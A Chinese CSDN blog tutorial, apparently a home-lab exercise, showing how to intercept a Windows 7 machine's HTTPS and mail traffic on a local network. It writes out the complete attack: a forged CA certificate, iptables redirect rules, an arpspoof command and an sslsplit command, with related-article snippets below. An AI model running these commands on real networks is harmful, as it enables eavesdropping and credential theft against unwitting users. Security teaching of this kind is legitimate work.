利用SSLsplit+arpspoof 实现ARP欺骗

最新推荐文章于 2024-08-31 07:07:00 发布
最新推荐文章于 2024-08-31 07:07:00 发布
阅读量590 收藏
点赞数
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/stantic/article/details/126472865
版权

参考

准备

一台kali ip 192.168.43.25

一台win7 ip 192.168.43.161

SSLsplit是用于对 SSL / TLS 加密的网络连接进行中间人攻击的工具。用于网络取证,应用程序安全性分析和渗透测试中。SSLsplit是纯粹的透明代理,不能充当浏览器中配置的HTTP或SOCKS代理。SSLsplit支持SSL 3.0,TLS 1.0,TLS 1.1和TLS 1.2,以及可选的SSL 2.0。

先伪造证书

利用openssl生成证书私钥
openssl genrsa -out ca.key 2048
利用私钥签名生成证书
openssl req -new -x509 -days 1096 -key ca.key -out ca.crt

可以看到在主目录下生产了密钥和证书。

之后开启路由转发

 

  •  
    sysctl -w net.ipv4.ip_forward=1 
     
 

 

 

echo 1 > /proc/sys/net/ipv4/ip_forward
 

都可以
 

开启是为了把拦截到的流量发给网关,这样目标机才可以上网,不开的话可以达到断网的效果。
 

设置iptables端口转发规则
 

iptables -t nat -F
清空当前表规则
-t:指定表;-A PERROUTING:路由前生效;-p:指定协议;–dport:接受流量的端口;-j:指定处理方法(REDIRECT重定向);–to-ports:转发端口
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080 【#HTTP】
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443 【#HTTPS】
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 【#MSA】
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 【#SMTPS】
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 【#IMAPS】
iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 【#POP3S】
iptables -t nat -L #显示所有规则
 

 

 然后开启arpspoof。拦截目标机流量,先看看目标机网关
 

 

 
 

arpspoof -i eth0 -t 目标ip -r 目标网关;-i(网卡,可以用ip a查看,有ip那个才是),-t(欺骗目标),-r(目标网关)
 

 
 

 启动SSLsplit进行攻击
 

创建目录
 

mkdir -p test/logdir
 

侦听设定的端口
 

sslsplit -D -l connect.log -j /home/kali/test -S /home/kali/test/logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
 

 

 
 

 伪造证书后,目标机访问https的网站会出现警告
 

 

之后在目标机点击继续访问,就劫持成功了,可以在connect.log查看访问信息,在test/logdir可查看传输数据
 

 
 

 

 可以看见,成功进行arp欺骗,并且用sslsplit劫持访问信息和传输数据。

                

        

        

    

  


    

      

        

            

              
                
                  stantic
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
利用SSLsplit工具实现TLS/SSL中间人攻击 ARP欺骗

				
			

			

				

					永远在奔跑的学习者
				

				

					11-15
					
					4785
					
				

			

		

		

			
				
SSL、TLS中间人攻击
利用方法:
ARP地址欺骗
修改DHCP服务器 (存在就近原则)
手动修改网关
修改DNS设置
修改HOSTS文件【高于DNS】
ICMP、STP、OSPF
中间人攻击前提
【以下某一条符合则可】

客户端已经信任伪造证书颁发机构(安装其根证书)
攻击者控制了合法证书颁发机构(控制CA服务器,为自己颁发证书)
客户端程序禁止了显示证书错误告警信息 (程序员个人能力有限)
...

			
		

	



                

              
                



	

		

			

				
					
利用SSLsplit+arpspoof 实现ARP欺骗劫持流量

				
			

			

				

					m0_63253040的博客
				

				

					08-17
					
					781
					
				

			

		

		

			
				
即在中间监听获取网络数据以便获取的有价值的信息实现攻击破坏的目的,即client-mid man-server,此处介绍的sslsplit可以作为mid man监听ssl信息及HTTP信息。http不做介绍仅仅实现代理功能,ssl实现代理的同时要与服务器建立连接,同时伪造证书与客户端建立连接,即双连接,依据获取的client信息再与服务器通信,从而实现明文数据监听。开启路由转发,我们才能把劫持到的目标机的流量请求发送给网关,使目标机能上网,不开启的话目标机无法上网,可以达到断网的目的。...

			
		

	



                


  
              

                


	

		

			

				
					
sslsplitSSL攻击工具)

				
			

			

				

					weixin_30292745的博客
				

				

					11-01
					
					263
					
				

			

		

		

			
				
d
转载于:https://www.cnblogs.com/yinlili/p/9889662.html

			
		

	





	

		

			

				
					
利用ARP欺骗+sslsplit实现ssl连接嗅探

				
			

			

				

					yxj0201的专栏
				

				

					08-02
					
					2526
					
				

			

		

		

			
				
原创:http://www.freebuf.com/sectool/48016.html


工具下载
sslsplit在kali系统中是自带的,源码下载地址如下:https://github.com/droe/sslsplit


生成中间ssl代理证书
生成一个私钥:

openssl genrsa -out ca.key 2048
然后使用私钥生成公钥证书:

op

			
		

	



		

			
		



	

		

			

				
					
利用arpspoof + SSLsplit尝试进行arp欺骗

				
			

			

				

					m0_64444909的博客
				

				

					09-07
					
					1979
					
				

			

		

		

			
				
kali

			
		

	





	

		

			

				
					
ArpSpoof-arp欺骗.rar

				
			

			

				

					04-03
				

			

		

		

			
				
ArpSpoof-arp欺骗.rar》是一款专用于Windows系统的ARP欺骗工具,它涉及到了网络通信中的重要概念和安全问题。ARP(Address Resolution Protocol)即地址解析协议,是TCP/IP协议栈中的一个关键组件,主要负责将IP...

			
		

	





	

		

			

				
					
parrotOS下利用arpspoof实现arp欺骗及路由转发问题

				
			

			

				

					为你而战的博客
				

				

					11-25
					
					1243
					
				

			

		

		

			
				
arpspoof实现arp欺骗及路由转发问题
地址解析协议(ARP):
Address Resolution Protocol,由于是IP协议使用了ARP协议,因此通常就把ARP协议划归网络层。作用:将IP解析为MAC地址。
ARP解析原理:


源主机发送ARP广播请求(FF-FF-FF-FF-FF-FF)
ARP报文内容:我是10.1.1.1 我的mac:@@-@@-@@-@@-@@-@@
谁是10.1.1.3 你的mac:?


目标主机接收ARP广播,并回复单播应答。


源主机接收单播应答,并存放

			
		

	





	

		

			

				
					
利用arpspoof + sslStrip尝试进行arp欺骗

				
			

			

				

					qq_63575829的博客
				

				

					09-06
					
					185
					
				

			

		

		

			
				
利用arpspoof + sslStrip尝试进行arp欺骗

			
		

	





	

		

			

				
					
python实现arpspoofarp欺骗,使目标断网

				
			

			

				

					m0_46633551的博客
				

				

					06-26
					
					3601
					
				

			

		

		

			
				
前言
最近安装了scapy这个库,感觉 到 了它的强大
首先你需要Npacp,Winpcap运行时有问题
然后安装所有依赖,pip install --pre scapy[complete]
这个我最推荐,这个可以安装 所有的依赖,直接安装scapy会出不少的问题,但Npcap是必须的,如果安装wireshark或Nmap的不用了
初级代码(demo.py)
from optparse import OptionParser 
from scapy.all import *
def arp_spoof(ta

			
		

	





	

		

			

				
					
SSL破解工具SSLsplit.zip

				
			

			

				

					07-16
				

			

		

		

			
				
SSLsplit 是一个针对SSL/TLS加密的网络连接进行攻击,为网络取证和渗透测试的工具。它会终止SSL / TLS和启动一个新的连接到原来的目的地,记录所有传输的数据。它支持普通的TCP和SSL,HTTP和HTTPS,和IPv4和IPv6。为SSL和HTTPS,它生成并签署伪造X509v3证书上飞使用的原始凭证的主题DN和subjectAltName扩展。它支持服务器名称显示,RSA,DSA和ECDSA密钥,DHE 和ECDHE密码套件。如果私钥是可用的,它也可以使用现有的证书。 
SSLsplit is a tool that performs man-in-the-middle attacks against SSL/TLS encrypted network connections for network forensics and penetration testing. It terminates SSL/TLS and initiates a new connection to the original destination, logging all data transmitted. It supports plain TCP and SSL, HTTP and HTTPS, and IPv4 and IPv6. For SSL and HTTPS, it generates and signs forged X509v3 certificates on-the-fly using the original certificate's subject DN and subjectAltName extension. It supports Server Name Indication, RSA, DSA, and ECDSA keys, and DHE and ECDHE cipher suites. It can also use existing certificates if the private key is available.

			
		

	





	

		

			

				
					
使用sslsplit实现https,imaps,pop3s, smtps等透明代理

				
			

			

				

					maoji的专栏
				

				

					11-09
					
					2137
					
				

			

		

		

			
				
参考链接
http://blog.csdn.net/jiayanhui2877/article/details/31379439

			
		

	





	

		

			

				
					
SSLsplit 使用教程

					
最新发布

				
			

			

				

					gitblog_00182的博客
				

				

					08-31
					
					573
					
				

			

		

		

			
				
SSLsplit 使用教程
 sslsplitTransparent SSL/TLS interception项目地址:https://gitcode.com/gh_mirrors/ss/sslsplit 项目介绍
SSLSplit 是一个用于对 SSL/TLS 加密的网络连接进行中间人攻击的工具,旨在用于网络取证、应用程序安全性分析和渗透测试。SSLSplit 是一个纯粹的透明代理,不能充当浏览...

			
		

	





	

		

			

				
					
使用sslsplit嗅探tls/ssl连接

				
			

			

				

					weixin_30409849的博客
				

				

					04-24
					
					994
					
				

			

		

		

			
				
首先发一个从youtube弄到的sslsplit的使用教程
http://v.qq.com/page/x/k/s/x019634j4ks.html
我最近演示了如何使用mitmproxty执行中间人攻击HTTP(S)连接。当mitmproxy工作支持基于HTTP的通信,它不了解其他基于基于TLS/SSL的流量,比如FTPS,通过SSL的SMTP,通过SSL的IMAP或者其他一些覆盖TLS/SS...

			
		

	





	

		

			

				
					
最新kali之sslsplit

				
			

			

				

					vanony的博客
				

				

					01-25
					
					1050
					
				

			

		

		

			
				
描述:
  透明的SSL / TLS拦截。
  SSLsplit是用于对SSL / TLS加密的网络连接进行中间人攻击的工具。 旨在用于网络取证,应用程序安全性分析和渗透测试。
  SSLsplit旨在透明地终止使用网络地址转换引擎重定向到该连接的连接。 然后,SSLsplit终止SSL / TLS并启动到原始目标地址的新SSL / TLS连接,同时记录传输的所有数据。 除了基于NAT的操作外,SSLsplit还支持静态目标并将SNI指示的服务器名称用作上游目标.SSLsplit纯粹是透明代理,不能充当在浏

			
		

	





	

		

			

				
					
网络安全】SSLSplit实现中间人攻击

					
热门推荐

				
			

			

				

					Walter的专栏
				

				

					06-16
					
					1万+
					
				

			

		

		

			
				
实验环境 2台机器属于同一网段,分别为192.168.68.62

			
		

	





	

		

			

				
					
https攻击工具详解(arp欺骗、中间人攻击)(openssl+sslscan+sslsplit

				
			

			

				

					m0_48907714的博客
				

				

					03-05
					
					5152
					
				

			

		

		

			
				
https攻击工具详解(arp欺骗、中间人攻击)(openssl+sslscan+sslsplit

			
		

	





	

		

			

				
					
sslsplit源码流程分析

				
			

			

				

					weixin_44376670的博客
				

				

					05-31
					
					1329
					
				

			

		

		

			
				
概述
官网地址:https://www.roe.ch/SSLsplit
https://github.com/droe/sslsplit
SSLsplit是用于对 SSL / TLS 加密的网络连接进行中间人攻击的工具。用于网络取证,应用程序安全性分析和渗透测试中。SSLsplit是纯粹的透明代理,不能充当浏览器中配置的HTTP或SOCKS代理。SSLsplit支持SSL 3.0,TLS 1.0,TLS 1.1和TLS 1.2,以及可选的SSL 2.0。
对于HTTPS连接,SSLsplit会动态生成并签名

			
		

	





	

		

			

				
					
利用arpspoof进行ARP欺骗截取网络信息

				
			

			

				

					
				

			

		

		

			
				
arpspoof是一个Kali Linux系统自带的工具,可以轻松实现ARP欺骗。在给定的例子中,攻击机(Kali Linux,IP: 192.168.31.88)使用arpspoof -i eth0 -t 192.168.31.91 192.168.31.1命令,其中-i指定网络接口,-t指定...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值